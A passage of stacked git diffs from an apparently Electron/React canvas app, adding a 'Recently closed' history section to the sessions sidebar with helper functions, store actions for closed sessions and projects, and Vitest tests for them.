+          )}
+        </div>
+      )}
+    </div>
+  )
+}

--- a/src/renderer/components/ClosedHistorySection.tsx
+++ b/src/renderer/components/ClosedHistorySection.tsx
@@ -73,6 +73,7 @@ export function ClosedHistorySection(props: ClosedHistorySectionProps): JSX.Elem
                     e.stopPropagation()
                     props.onDeleteProject(row.projectId)
                   }}
+                  onKeyDown={(e) => e.stopPropagation()}
                 >
                   ×
                 </button>
@@ -102,6 +103,7 @@ export function ClosedHistorySection(props: ClosedHistorySectionProps): JSX.Elem
                     e.stopPropagation()
                     props.onDiscardSession(row.projectId, row.entry.id)
                   }}
+                  onKeyDown={(e) => e.stopPropagation()}
                 >
                   ×
                 </button>

--- a/src/renderer/components/ClosedHistorySection.tsx
+++ b/src/renderer/components/ClosedHistorySection.tsx
@@ -54,12 +54,18 @@ export function ClosedHistorySection(props: ClosedHistorySectionProps): JSX.Elem
                   if (e.key === 'Enter' || e.key === ' ') props.onReopenProject(row.projectId)
                 }}
               >
+                {/* Same className the sidebar's own project rows pass (SessionsSidebar's
+                    ss-group__head). ProjectGlyph deliberately carries no box CSS of its own —
+                    "every wired call site passes its own className" — so omitting it renders the
+                    monogram fallback as a bare colored span instead of the 18px circular badge
+                    every other project row shows. `size` is not the substitute: it only sets the
+                    EMOJI font-size and is inert for the monogram variant. */}
                 <ProjectGlyph
                   icon={row.project.icon}
                   color={row.project.color}
                   name={row.project.name}
                   variant="monogram"
-                  size={15}
+                  className="ss-group__monogram"
                 />
                 <span className="sessions-sidebar__history-name">{row.project.name}</span>
                 <span className="sessions-sidebar__history-age">

--- a/src/renderer/components/SessionsSidebar.tsx
+++ b/src/renderer/components/SessionsSidebar.tsx
@@ -19,12 +19,15 @@ import {
 } from '../lib/sessionList'
 import { SessionRow } from './SessionRow'
 import { ProjectGlyph } from './ProjectGlyph'
+import { ClosedHistorySection } from './ClosedHistorySection'
 import { IconBellFilled, IconCircleCheck, IconPin } from './icons'
 import { useProjects } from '../state/projects'
 import { useSettings } from '../state/settings'
 import { useAgentStatus } from '../state/agentStatus'
 import { useSessionNaming } from '../state/sessionNaming'
 import { useSession } from '../session/session'
+
+const HISTORY_COLLAPSE_KEY = 'history'
 
 export interface SessionsSidebarProps {
   open: boolean
@@ -63,6 +66,12 @@ export interface SessionsSidebarProps {
   /** Reorder a project to sit before another (null = to the end). Shared order with the
    *  tab bar: both render the projects array, so one drag updates both surfaces. */
   onReorderProject(draggedId: string, beforeId: string | null): void
+  /** Reopen a closed project (Welcome screen's existing action, now also reachable here). */
+  onReopenProject(id: string): void
+  /** Permanently delete a closed project (Welcome screen's existing action). */
+  onDeleteProject(id: string): void
+  onReopenClosedSession(projectId: string, entryId: string): void
+  onDiscardClosedSession(projectId: string, entryId: string): void
   onMouseEnter?(): void
   onMouseLeave?(): void
 }
@@ -167,11 +176,16 @@ export function SessionsSidebar(props: SessionsSidebarProps): JSX.Element | null
   // forever, and a canvas churns through group ids.
   const toggleCollapse = (key: string, currentlyCollapsed: boolean): void => {
     const current = useSettings.getState().settings.sidebarCollapsedItems
-    const pruned = pruneCollapsedItems(current, liveCollapseKeys(groups), key)
+    const pruned = pruneCollapsedItems(
+      current,
+      new Set([...liveCollapseKeys(groups), HISTORY_COLLAPSE_KEY]),
+      key
+    )
     useSettings.getState().update({
       sidebarCollapsedItems: { ...pruned, [key]: !currentlyCollapsed }
     })
   }
+  const historyCollapsed = collapsedItems[HISTORY_COLLAPSE_KEY] ?? false
 
   // Drop-target wiring shared by the project header (ungroup) and group sub-headers (add).
   // Only reacts while dragging a session that belongs to the same project.
@@ -693,6 +707,17 @@ export function SessionsSidebar(props: SessionsSidebarProps): JSX.Element | null
         })
         )}
       </div>
+
+      <ClosedHistorySection
+        projects={allProjects}
+        nowMs={statusNow}
+        collapsed={historyCollapsed}
+        onToggleCollapse={() => toggleCollapse(HISTORY_COLLAPSE_KEY, historyCollapsed)}
+        onReopenProject={props.onReopenProject}
+        onDeleteProject={props.onDeleteProject}
+        onReopenSession={props.onReopenClosedSession}
+        onDiscardSession={props.onDiscardClosedSession}
+      />
     </aside>
   )
 }

--- a/src/renderer/components/SessionsSidebar.wiring.test.ts
+++ b/src/renderer/components/SessionsSidebar.wiring.test.ts
@@ -1,0 +1,46 @@
+import fs from 'fs'
+import path from 'path'
+import { describe, it, expect } from 'vitest'
+
+const SIDEBAR_SRC = fs.readFileSync(path.join(__dirname, 'SessionsSidebar.tsx'), 'utf8')
+const CANVAS_SRC = fs.readFileSync(path.join(__dirname, '../canvas/Canvas.tsx'), 'utf8')
+
+describe('SessionsSidebar renders and wires the Recently closed history section', () => {
+  it('declares the new props', () => {
+    expect(SIDEBAR_SRC).toContain('onReopenProject(id: string): void')
+    expect(SIDEBAR_SRC).toContain('onDeleteProject(id: string): void')
+    expect(SIDEBAR_SRC).toContain('onReopenClosedSession(projectId: string, entryId: string): void')
+    expect(SIDEBAR_SRC).toContain('onDiscardClosedSession(projectId: string, entryId: string): void')
+  })
+
+  it('renders ClosedHistorySection off its own unfiltered project list, not a new prop', () => {
+    expect(SIDEBAR_SRC).toContain('<ClosedHistorySection')
+    expect(SIDEBAR_SRC).toContain('projects={allProjects}')
+    expect(SIDEBAR_SRC).toContain('onReopenSession={props.onReopenClosedSession}')
+    expect(SIDEBAR_SRC).toContain('onDiscardSession={props.onDiscardClosedSession}')
+    // The redundant prop this codebase's SessionsSidebar never needed — allProjects is already
+    // a local variable in this file.
+    expect(SIDEBAR_SRC).not.toContain('allProjects: Project[]')
+  })
+
+  it('keeps the history disclosure key alive across prunes even though it is not a project/frame key', () => {
+    expect(SIDEBAR_SRC).toContain("const HISTORY_COLLAPSE_KEY = 'history'")
+    expect(SIDEBAR_SRC).toContain('new Set([...liveCollapseKeys(groups), HISTORY_COLLAPSE_KEY])')
+  })
+})
+
+describe('Canvas wires the history callbacks into SessionsSidebar', () => {
+  it('reuses the existing reopenProject/requestDeleteClosed callbacks and the new reopen/discard commands', () => {
+    expect(CANVAS_SRC).toContain('onReopenProject={reopenProject}')
+    expect(CANVAS_SRC).toContain('onDeleteProject={requestDeleteClosed}')
+    expect(CANVAS_SRC).toContain('onReopenClosedSession={reopenClosedSessionCommand}')
+  })
+
+  it('flushes a discard to disk immediately, since the discarded project may not be the active one', () => {
+    const fnStart = CANVAS_SRC.indexOf('onDiscardClosedSession={')
+    expect(fnStart).toBeGreaterThan(-1)
+    const fnBody = CANVAS_SRC.slice(fnStart, fnStart + 250)
+    expect(fnBody).toContain('.discardClosedSession(projectId, entryId)')
+    expect(fnBody).toContain('void writeDisk()')
+  })
+})

--- a/src/renderer/lib/closedHistory.test.ts
+++ b/src/renderer/lib/closedHistory.test.ts
@@ -13,7 +13,7 @@ const node = (over: Partial<CanvasNode> = {}): CanvasNode =>
 describe('buildClosedSessionEntries', () => {
   it('builds one entry per deleted, restorable node', () => {
     const nodes = [node({ id: 'n1' }), node({ id: 'n2' })]
-    const entries = buildClosedSessionEntries(new Set(['n1']), nodes, 999, () => 'fresh-id')
+    const entries = buildClosedSessionEntries(new Set(['n1']), nodes, 999, (_nodeId) => 'fresh-id')
     expect(entries).toHaveLength(1)
     expect(entries[0]).toMatchObject({ id: 'fresh-id', closedAt: 999 })
     expect(entries[0].node.id).toBe('n1')
@@ -32,6 +32,16 @@ describe('buildClosedSessionEntries', () => {
     const nodes = [node({ id: 'n1' }), node({ id: 'n2' })]
     const entries = buildClosedSessionEntries(new Set(['n2']), nodes, 1, () => 'x')
     expect(entries.map((e) => e.node.id)).toEqual(['n2'])
+  })
+
+  it('hands makeId the SOURCE node id, not called bare — the correlation deleteNodes relies on', () => {
+    const nodes = [node({ id: 'n1' }), node({ id: 'n2' })]
+    const seen: string[] = []
+    buildClosedSessionEntries(new Set(['n1', 'n2']), nodes, 1, (nodeId) => {
+      seen.push(nodeId)
+      return `id-for-${nodeId}`
+    })
+    expect(seen).toEqual(['n1', 'n2'])
   })
 })
 

--- a/src/renderer/lib/closedHistory.test.ts
+++ b/src/renderer/lib/closedHistory.test.ts
@@ -67,6 +67,29 @@ describe('stateToReopenSnapshot', () => {
     expect(snap.extent).toBeUndefined()
     expect(snap.data.text).toBe('hi')
   })
+
+  // Belt-and-braces behind validClosedSessions (which is what actually rejects these at the file
+  // boundary). recreateNodeFromSnapshot assigns node.position from one of these two UNGUARDED and
+  // React Flow dereferences position.x, so any path that reaches here with an entry the validator
+  // never saw must land the node at a real point, not white-screen the renderer.
+  it('falls back rather than emitting an undefined position when one point is missing', () => {
+    const node = {
+      id: 'n1', kind: 'terminal', position: { x: 3, y: 4 },
+      size: { width: 1, height: 1 }, title: 't', color: '#fff', group: null
+    }
+    const noAbs = { id: 'e1', closedAt: 1, node } as unknown as ClosedSessionEntry
+    expect(stateToReopenSnapshot(noAbs).absolutePosition).toEqual({ x: 3, y: 4 })
+
+    const { position: _dropped, ...positionless } = node
+    const noPos = {
+      id: 'e1', closedAt: 1, node: positionless, absolutePosition: { x: 7, y: 8 }
+    } as unknown as ClosedSessionEntry
+    expect(stateToReopenSnapshot(noPos).position).toEqual({ x: 7, y: 8 })
+
+    const neither = { id: 'e1', closedAt: 1, node: positionless } as unknown as ClosedSessionEntry
+    expect(stateToReopenSnapshot(neither).position).toEqual({ x: 0, y: 0 })
+    expect(stateToReopenSnapshot(neither).absolutePosition).toEqual({ x: 0, y: 0 })
+  })
 })
 
 describe('mergeClosedHistory', () => {

--- a/src/renderer/lib/closedHistory.test.ts
+++ b/src/renderer/lib/closedHistory.test.ts
@@ -1,0 +1,105 @@
+import { describe, it, expect } from 'vitest'
+import { buildClosedSessionEntries, stateToReopenSnapshot, mergeClosedHistory } from './closedHistory'
+import type { CanvasNode } from '@renderer/state/workspace'
+import type { ClosedSessionEntry, Project } from '@shared/types'
+
+const node = (over: Partial<CanvasNode> = {}): CanvasNode =>
+  ({
+    id: 'n1', type: 'terminal', position: { x: 5, y: 5 }, width: 400, height: 300,
+    data: { title: 'shell', color: '#fff', group: null, cwd: '/tmp/x' },
+    ...over
+  }) as CanvasNode
+
+describe('buildClosedSessionEntries', () => {
+  it('builds one entry per deleted, restorable node', () => {
+    const nodes = [node({ id: 'n1' }), node({ id: 'n2' })]
+    const entries = buildClosedSessionEntries(new Set(['n1']), nodes, 999, () => 'fresh-id')
+    expect(entries).toHaveLength(1)
+    expect(entries[0]).toMatchObject({ id: 'fresh-id', closedAt: 999 })
+    expect(entries[0].node.id).toBe('n1')
+    expect(entries[0].node.cwd).toBe('/tmp/x')
+    expect(entries[0].absolutePosition).toEqual({ x: 5, y: 5 })
+  })
+
+  it('excludes group/subagent/loop nodes and the account-login node, same as snapshotNode', () => {
+    const groupNode = node({ id: 'g1', type: 'group' })
+    const loginNode = node({ id: 'login', data: { title: 'Claude login', color: '#fff', group: null, initialCommand: 'claude /login' } })
+    const entries = buildClosedSessionEntries(new Set(['g1', 'login']), [groupNode, loginNode], 1, () => 'x')
+    expect(entries).toHaveLength(0)
+  })
+
+  it('only builds entries for ids actually in deletedIds', () => {
+    const nodes = [node({ id: 'n1' }), node({ id: 'n2' })]
+    const entries = buildClosedSessionEntries(new Set(['n2']), nodes, 1, () => 'x')
+    expect(entries.map((e) => e.node.id)).toEqual(['n2'])
+  })
+})
+
+describe('stateToReopenSnapshot', () => {
+  it('carries position/parent/size/data through for recreateNodeFromSnapshot', () => {
+    const entry: ClosedSessionEntry = {
+      id: 'e1', closedAt: 1,
+      node: {
+        id: 'n1', kind: 'terminal', position: { x: 1, y: 2 }, size: { width: 10, height: 20 },
+        title: 'shell', color: '#fff', group: null, parentId: 'grp-1', cwd: '/tmp/x', agentId: 'claude'
+      },
+      absolutePosition: { x: 100, y: 200 }
+    }
+    const snap = stateToReopenSnapshot(entry)
+    expect(snap.type).toBe('terminal')
+    expect(snap.position).toEqual({ x: 1, y: 2 })
+    expect(snap.absolutePosition).toEqual({ x: 100, y: 200 })
+    expect(snap.parentId).toBe('grp-1')
+    expect(snap.extent).toBe('parent')
+    expect(snap.size).toEqual({ width: 10, height: 20 })
+    expect(snap.data.cwd).toBe('/tmp/x')
+    expect(snap.data.agentId).toBe('claude')
+  })
+
+  it('omits parentId/extent when the node was never parented', () => {
+    const entry: ClosedSessionEntry = {
+      id: 'e1', closedAt: 1,
+      node: { id: 'n1', kind: 'sticky', position: { x: 0, y: 0 }, size: { width: 10, height: 10 }, title: 'note', color: '#fff', group: null, text: 'hi' },
+      absolutePosition: { x: 0, y: 0 }
+    }
+    const snap = stateToReopenSnapshot(entry)
+    expect(snap.parentId).toBeUndefined()
+    expect(snap.extent).toBeUndefined()
+    expect(snap.data.text).toBe('hi')
+  })
+})
+
+describe('mergeClosedHistory', () => {
+  const proj = (over: Partial<Project>): Project =>
+    ({ id: 'p', name: 'p', color: '#fff', viewport: { x: 0, y: 0, zoom: 1 }, nodes: [], ...over }) as Project
+
+  it('merges closed projects and closed sessions across all projects, sorted newest-first', () => {
+    const entry = (id: string, closedAt: number): ClosedSessionEntry => ({
+      id, closedAt,
+      node: { id: 'n', kind: 'terminal', position: { x: 0, y: 0 }, size: { width: 1, height: 1 }, title: 't', color: '#fff', group: null },
+      absolutePosition: { x: 0, y: 0 }
+    })
+    const projects = [
+      proj({ id: 'a', closed: true, closedAt: 50 }),
+      proj({ id: 'b', closedSessions: [entry('s1', 100), entry('s2', 10)] })
+    ]
+    const rows = mergeClosedHistory(projects)
+    expect(rows.map((r) => (r.kind === 'project' ? r.projectId : r.entry.id))).toEqual(['s1', 'a', 's2'])
+  })
+
+  it('sorts a project with no closedAt last', () => {
+    const projects = [proj({ id: 'a', closed: true }), proj({ id: 'b', closed: true, closedAt: 5 })]
+    const rows = mergeClosedHistory(projects)
+    expect(rows.map((r) => (r.kind === 'project' ? r.projectId : ''))).toEqual(['b', 'a'])
+  })
+
+  it('ignores an open project with no closedSessions', () => {
+    const rows = mergeClosedHistory([proj({ id: 'a' })])
+    expect(rows).toHaveLength(0)
+  })
+
+  it('excludes an unavailable closed project', () => {
+    const rows = mergeClosedHistory([proj({ id: 'a', closed: true, unavailable: true, closedAt: 5 })])
+    expect(rows).toHaveLength(0)
+  })
+})

--- a/src/renderer/lib/closedHistory.ts
+++ b/src/renderer/lib/closedHistory.ts
@@ -9,20 +9,27 @@ import { absolutePosition, type FocusableNode } from './nodeFocus'
  * (group/subagent/loop/account-login nodes are excluded from both). `allNodes` must be the FULL
  * live tree from BEFORE the deletion, so parent-chain absolute positions are still resolvable.
  * `now`/`makeId` are injected so this stays a pure, deterministically testable function; call
- * sites pass `Date.now()` and `uuid` (`lib/uuid.ts`) — NEVER `crypto.randomUUID`, which is absent
- * outside a secure context and so throws in the Server Edition served over plain HTTP on a LAN.
+ * sites pass `Date.now()` and a `uuid` (`lib/uuid.ts`)-backed minter — NEVER `crypto.randomUUID`,
+ * which is absent outside a secure context and so throws in the Server Edition served over plain
+ * HTTP on a LAN.
+ *
+ * `makeId` is handed the SOURCE node's id (not called bare) so the caller (`deleteNodes`) can
+ * record which minted entry id belongs to which node — that correlation is what lets a ⇧⌘T
+ * snapshot and its persisted twin consume each other on reopen (see
+ * `ReopenNodeSnapshot.closedSessionId`). Correlating by node id rather than by array position
+ * keeps the two histories' independent filtering passes from ever silently misaligning.
  */
 export function buildClosedSessionEntries(
   deletedIds: ReadonlySet<string>,
   allNodes: readonly CanvasNode[],
   now: number,
-  makeId: () => string
+  makeId: (nodeId: string) => string
 ): ClosedSessionEntry[] {
   return allNodes
     .filter((n) => deletedIds.has(n.id))
     .filter((n) => snapshotNode(n, allNodes as readonly FocusableNode[]) !== null)
     .map((n) => ({
-      id: makeId(),
+      id: makeId(n.id),
       closedAt: now,
       node: flowToNodeStates([n])[0],
       absolutePosition: absolutePosition(

--- a/src/renderer/lib/closedHistory.ts
+++ b/src/renderer/lib/closedHistory.ts
@@ -1,0 +1,102 @@
+import type { CanvasNodeState, ClosedSessionEntry, Project } from '@shared/types'
+import { flowToNodeStates, type CanvasNode } from '@renderer/state/workspace'
+import { snapshotNode, type ReopenNodeSnapshot, type RestorableNodeKind } from './reopenNode'
+import { absolutePosition, type FocusableNode } from './nodeFocus'
+
+/**
+ * Builds one `ClosedSessionEntry` per node in `deletedIds` that `snapshotNode` would also accept
+ * for the in-memory `Cmd+Shift+T` history — the two histories must agree on what's restorable
+ * (group/subagent/loop/account-login nodes are excluded from both). `allNodes` must be the FULL
+ * live tree from BEFORE the deletion, so parent-chain absolute positions are still resolvable.
+ * `now`/`makeId` are injected so this stays a pure, deterministically testable function; call
+ * sites pass `Date.now()`/`crypto.randomUUID`.
+ */
+export function buildClosedSessionEntries(
+  deletedIds: ReadonlySet<string>,
+  allNodes: readonly CanvasNode[],
+  now: number,
+  makeId: () => string
+): ClosedSessionEntry[] {
+  return allNodes
+    .filter((n) => deletedIds.has(n.id))
+    .filter((n) => snapshotNode(n, allNodes as readonly FocusableNode[]) !== null)
+    .map((n) => ({
+      id: makeId(),
+      closedAt: now,
+      node: flowToNodeStates([n])[0],
+      absolutePosition: absolutePosition(
+        { id: n.id, position: n.position, parentId: n.parentId },
+        allNodes as readonly FocusableNode[]
+      )
+    }))
+}
+
+/**
+ * Converts a persisted `ClosedSessionEntry` back into the shape `recreateNodeFromSnapshot`
+ * already accepts. `CanvasNodeState` and `NodeData` share field names for everything both
+ * track (by construction of `nodeStatesToFlow`/`flowToNodeStates`), so this is a direct field
+ * copy, not a lossy remap.
+ */
+export function stateToReopenSnapshot(entry: ClosedSessionEntry): ReopenNodeSnapshot {
+  const n = entry.node
+  return {
+    type: n.kind as RestorableNodeKind,
+    position: n.position,
+    absolutePosition: entry.absolutePosition,
+    ...(n.parentId ? { parentId: n.parentId, extent: 'parent' as const } : {}),
+    size: n.size,
+    data: {
+      title: n.title,
+      titleAuto: n.titleAuto,
+      color: n.color,
+      group: n.group,
+      tags: n.tags,
+      collapsed: n.collapsed,
+      hideFanout: n.hideFanout,
+      shell: n.shell,
+      cwd: n.cwd,
+      text: n.text,
+      textUpdatedAt: n.textUpdatedAt,
+      textUpdatedBy: n.textUpdatedBy,
+      filePath: n.filePath,
+      fileMissing: n.fileMissing,
+      url: n.url,
+      partition: n.partition,
+      diffStaged: n.diffStaged,
+      commitOid: n.commitOid,
+      highScore: n.highScore,
+      agentId: n.agentId,
+      agentModel: n.agentModel,
+      accountId: n.accountId,
+      agentSessionId: n.agentSessionId,
+      ssh: n.ssh,
+      sshRemoteTmux: n.sshRemoteTmux,
+      sshFs: n.sshFs
+    }
+  }
+}
+
+export type ClosedHistoryRow =
+  | { kind: 'project'; projectId: string; closedAt: number; project: Project }
+  | { kind: 'session'; projectId: string; closedAt: number; entry: ClosedSessionEntry }
+
+/**
+ * Merges every project's closed-session entries with every closed, AVAILABLE project into one
+ * list, sorted newest-first. `unavailable` (a ref whose folder is missing / server unreachable —
+ * same check Canvas's own `closedProjects` selector already applies) is excluded: reopening it
+ * would activate an empty placeholder, and it has no history worth showing. An entry/project with
+ * no known `closedAt` (pre-existing data from before that field existed) sorts last via the `-1`
+ * sentinel — never `NaN` from subtracting `undefined`.
+ */
+export function mergeClosedHistory(projects: readonly Project[]): ClosedHistoryRow[] {
+  const rows: ClosedHistoryRow[] = []
+  for (const p of projects) {
+    if (p.closed && !p.unavailable) {
+      rows.push({ kind: 'project', projectId: p.id, closedAt: p.closedAt ?? -1, project: p })
+    }
+    for (const entry of p.closedSessions ?? []) {
+      rows.push({ kind: 'session', projectId: p.id, closedAt: entry.closedAt, entry })
+    }
+  }
+  return rows.sort((a, b) => b.closedAt - a.closedAt)
+}

--- a/src/renderer/lib/closedHistory.ts
+++ b/src/renderer/lib/closedHistory.ts
@@ -9,7 +9,8 @@ import { absolutePosition, type FocusableNode } from './nodeFocus'
  * (group/subagent/loop/account-login nodes are excluded from both). `allNodes` must be the FULL
  * live tree from BEFORE the deletion, so parent-chain absolute positions are still resolvable.
  * `now`/`makeId` are injected so this stays a pure, deterministically testable function; call
- * sites pass `Date.now()`/`crypto.randomUUID`.
+ * sites pass `Date.now()` and `uuid` (`lib/uuid.ts`) — NEVER `crypto.randomUUID`, which is absent
+ * outside a secure context and so throws in the Server Edition served over plain HTTP on a LAN.
  */
 export function buildClosedSessionEntries(
   deletedIds: ReadonlySet<string>,
@@ -36,13 +37,21 @@ export function buildClosedSessionEntries(
  * already accepts. `CanvasNodeState` and `NodeData` share field names for everything both
  * track (by construction of `nodeStatesToFlow`/`flowToNodeStates`), so this is a direct field
  * copy, not a lossy remap.
+ *
+ * The position fallbacks are belt-and-braces behind `validClosedSessions`, which is what actually
+ * rejects a positionless entry at the file boundary. They exist because
+ * `recreateNodeFromSnapshot` assigns `node.position` from one of these two UNGUARDED, and React
+ * Flow dereferences `position.x` — so any path that ever reaches here with an entry the validator
+ * did not see (an inline index project, a future caller) lands the node at the origin instead of
+ * white-screening the renderer.
  */
 export function stateToReopenSnapshot(entry: ClosedSessionEntry): ReopenNodeSnapshot {
   const n = entry.node
+  const origin = { x: 0, y: 0 }
   return {
     type: n.kind as RestorableNodeKind,
-    position: n.position,
-    absolutePosition: entry.absolutePosition,
+    position: n.position ?? entry.absolutePosition ?? origin,
+    absolutePosition: entry.absolutePosition ?? n.position ?? origin,
     ...(n.parentId ? { parentId: n.parentId, extent: 'parent' as const } : {}),
     size: n.size,
     data: {

--- a/src/renderer/lib/reopenNode.test.ts
+++ b/src/renderer/lib/reopenNode.test.ts
@@ -43,8 +43,8 @@ describe('snapshotNode', () => {
     })
   })
 
-  it('returns null for group/subagent/loop nodes', () => {
-    for (const type of ['group', 'subagent', 'loop'] as const) {
+  it('returns null for group/subagent/loop/trigger nodes', () => {
+    for (const type of ['group', 'subagent', 'loop', 'trigger'] as const) {
       const node = { type, position: { x: 0, y: 0 }, data: { title: 'x', color: '#fff', group: null } }
       expect(snapshotNode(node, [])).toBeNull()
     }

--- a/src/renderer/lib/reopenNode.ts
+++ b/src/renderer/lib/reopenNode.ts
@@ -29,6 +29,16 @@ export interface ReopenNodeSnapshot {
   extent?: 'parent'
   size?: { width: number; height: number }
   data: NodeData
+  /**
+   * The id of the matching entry this same delete also recorded in the persisted
+   * `Project.closedSessions` history, when one was recorded — set only by `deleteNodes` (Canvas),
+   * never by `stateToReopenSnapshot`'s reverse direction. Lets the two ledgers consume each
+   * other: reopening this ⇧⌘T snapshot drops the persisted twin (`reopenLastClosedCommand`), and
+   * reopening the persisted twin from the sidebar drops this snapshot out of the ⇧⌘T stack
+   * (`reopenClosedSessionCommand` → `useReopenHistory.dropByClosedSessionId`) — so a single delete
+   * can never be reopened twice into two duplicate nodes.
+   */
+  closedSessionId?: string
 }
 
 type SnapshotSource = {

--- a/src/renderer/lib/reopenNode.ts
+++ b/src/renderer/lib/reopenNode.ts
@@ -44,7 +44,10 @@ type SnapshotSource = {
   data: NodeData
 }
 
-const UNRESTORABLE: ReadonlySet<string> = new Set(['group', 'subagent', 'loop'])
+// 'trigger' has no matching case in recreateNodeFromSnapshot's buildBase below (it always
+// recreates to null) — excluded here so a deleted trigger node never becomes a dead, clickable
+// closed-session/reopen-history entry.
+const UNRESTORABLE: ReadonlySet<string> = new Set(['group', 'subagent', 'loop', 'trigger'])
 
 /** Captures a node right before deletion. `all` must be the FULL live tree (before any
  *  mutation), so the parent chain is still walkable. Returns null for kinds this feature

--- a/src/renderer/state/projects.closedHistory.test.ts
+++ b/src/renderer/state/projects.closedHistory.test.ts
@@ -1,5 +1,6 @@
 import { describe, it, expect } from 'vitest'
 import { useProjects } from './projects'
+import { CLOSED_SESSIONS_CAP } from '@shared/types'
 import type { ClosedSessionEntry } from '@shared/types'
 
 const entry = (id: string, closedAt = 1): ClosedSessionEntry => ({
@@ -35,9 +36,11 @@ describe('recordClosedSessions', () => {
     expect(useProjects.getState().getProject('p1')?.closedSessions?.map((e) => e.id)).toEqual(['b', 'a'])
 
     setup()
-    const many = Array.from({ length: 25 }, (_, i) => entry(`e${i}`))
+    const many = Array.from({ length: CLOSED_SESSIONS_CAP + 5 }, (_, i) => entry(`e${i}`))
     useProjects.getState().recordClosedSessions('p1', many)
-    expect(useProjects.getState().getProject('p1')?.closedSessions).toHaveLength(20)
+    expect(useProjects.getState().getProject('p1')?.closedSessions).toHaveLength(
+      CLOSED_SESSIONS_CAP
+    )
   })
 
   it('is a no-op for an unknown project', () => {

--- a/src/renderer/state/projects.closedHistory.test.ts
+++ b/src/renderer/state/projects.closedHistory.test.ts
@@ -1,0 +1,74 @@
+import { describe, it, expect } from 'vitest'
+import { useProjects } from './projects'
+import type { ClosedSessionEntry } from '@shared/types'
+
+const entry = (id: string, closedAt = 1): ClosedSessionEntry => ({
+  id, closedAt,
+  node: { id: 'n1', kind: 'terminal', position: { x: 0, y: 0 }, size: { width: 1, height: 1 }, title: 't', color: '#fff', group: null },
+  absolutePosition: { x: 0, y: 0 }
+})
+
+const setup = () => {
+  useProjects.getState().hydrate({
+    version: 2,
+    activeProjectId: 'p1',
+    projects: [{ id: 'p1', name: 'x', color: '#fff', viewport: { x: 0, y: 0, zoom: 1 }, nodes: [] }]
+  })
+}
+
+describe('closeProject stamps closedAt', () => {
+  it('sets closedAt alongside closed', () => {
+    setup()
+    const before = Date.now()
+    useProjects.getState().closeProject('p1')
+    const p = useProjects.getState().getProject('p1')
+    expect(p?.closed).toBe(true)
+    expect(p?.closedAt).toBeGreaterThanOrEqual(before)
+  })
+})
+
+describe('recordClosedSessions', () => {
+  it('prepends new entries newest-first and caps at 20', () => {
+    setup()
+    useProjects.getState().recordClosedSessions('p1', [entry('a')])
+    useProjects.getState().recordClosedSessions('p1', [entry('b')])
+    expect(useProjects.getState().getProject('p1')?.closedSessions?.map((e) => e.id)).toEqual(['b', 'a'])
+
+    setup()
+    const many = Array.from({ length: 25 }, (_, i) => entry(`e${i}`))
+    useProjects.getState().recordClosedSessions('p1', many)
+    expect(useProjects.getState().getProject('p1')?.closedSessions).toHaveLength(20)
+  })
+
+  it('is a no-op for an unknown project', () => {
+    setup()
+    useProjects.getState().recordClosedSessions('missing', [entry('a')])
+    expect(useProjects.getState().getProject('missing')).toBeUndefined()
+  })
+})
+
+describe('consumeClosedSession', () => {
+  it('removes and returns the matching entry', () => {
+    setup()
+    useProjects.getState().recordClosedSessions('p1', [entry('a'), entry('b')])
+    const found = useProjects.getState().consumeClosedSession('p1', 'a')
+    expect(found?.id).toBe('a')
+    expect(useProjects.getState().getProject('p1')?.closedSessions?.map((e) => e.id)).toEqual(['b'])
+  })
+
+  it('returns undefined for a missing id', () => {
+    setup()
+    useProjects.getState().recordClosedSessions('p1', [entry('a')])
+    expect(useProjects.getState().consumeClosedSession('p1', 'nope')).toBeUndefined()
+    expect(useProjects.getState().getProject('p1')?.closedSessions).toHaveLength(1)
+  })
+})
+
+describe('discardClosedSession', () => {
+  it('removes an entry without returning it', () => {
+    setup()
+    useProjects.getState().recordClosedSessions('p1', [entry('a'), entry('b')])
+    useProjects.getState().discardClosedSession('p1', 'a')
+    expect(useProjects.getState().getProject('p1')?.closedSessions?.map((e) => e.id)).toEqual(['b'])
+  })
+})

--- a/src/renderer/state/projects.ts
+++ b/src/renderer/state/projects.ts
@@ -11,6 +11,7 @@ import type {
   Viewport,
   Workspace
 } from '@shared/types'
+import { CLOSED_SESSIONS_CAP } from '@shared/types'
 import { collisionSeed, derivedProjectId } from '@shared/project-id'
 import type { ProjectCapability } from '@shared/project-capabilities'
 import type { ProjectIcon } from '@shared/project-icon'
@@ -146,8 +147,8 @@ interface ProjectsState {
   /** Restores a closed project and makes it active. No-op if the id is unknown. */
   reopenProject(id: string): void
 
-  /** Records freshly deleted sessions into the project's history (newest-first, capped at 20).
-   *  No-op if `entries` is empty or the project no longer exists. */
+  /** Records freshly deleted sessions into the project's history (newest-first, capped at
+   *  `CLOSED_SESSIONS_CAP`). No-op if `entries` is empty or the project no longer exists. */
   recordClosedSessions(projectId: string, entries: ClosedSessionEntry[]): void
   /** Removes and returns the matching closed-session entry, or `undefined` if it's already gone
    *  (e.g. discarded from another surface first). */
@@ -605,7 +606,13 @@ export const useProjects = create<ProjectsState>((set, get) => ({
       projects: s.projects.map((p) =>
         p.id !== projectId
           ? p
-          : { ...p, closedSessions: [...entries, ...(p.closedSessions ?? [])].slice(0, 20) }
+          : {
+              ...p,
+              closedSessions: [...entries, ...(p.closedSessions ?? [])].slice(
+                0,
+                CLOSED_SESSIONS_CAP
+              )
+            }
       )
     }))
   },

--- a/src/renderer/state/projects.ts
+++ b/src/renderer/state/projects.ts
@@ -4,6 +4,7 @@ import type {
   BridgeLink,
   CanvasMutation,
   CanvasNodeState,
+  ClosedSessionEntry,
   NavStop,
   Project,
   ProjectKanban,
@@ -144,6 +145,15 @@ interface ProjectsState {
   closeProject(id: string): string
   /** Restores a closed project and makes it active. No-op if the id is unknown. */
   reopenProject(id: string): void
+
+  /** Records freshly deleted sessions into the project's history (newest-first, capped at 20).
+   *  No-op if `entries` is empty or the project no longer exists. */
+  recordClosedSessions(projectId: string, entries: ClosedSessionEntry[]): void
+  /** Removes and returns the matching closed-session entry, or `undefined` if it's already gone
+   *  (e.g. discarded from another surface first). */
+  consumeClosedSession(projectId: string, entryId: string): ClosedSessionEntry | undefined
+  /** Removes a closed-session entry without reopening it. */
+  discardClosedSession(projectId: string, entryId: string): void
 
   /**
    * Registers (or finds) the project for a local directory WITHOUT activating it — the store half
@@ -575,7 +585,7 @@ export const useProjects = create<ProjectsState>((set, get) => ({
   closeProject(id) {
     const { projects, activeProjectId } = get()
     const index = projects.findIndex((p) => p.id === id)
-    const next = projects.map((p) => (p.id === id ? { ...p, closed: true } : p))
+    const next = projects.map((p) => (p.id === id ? { ...p, closed: true, closedAt: Date.now() } : p))
     let nextActive = activeProjectId
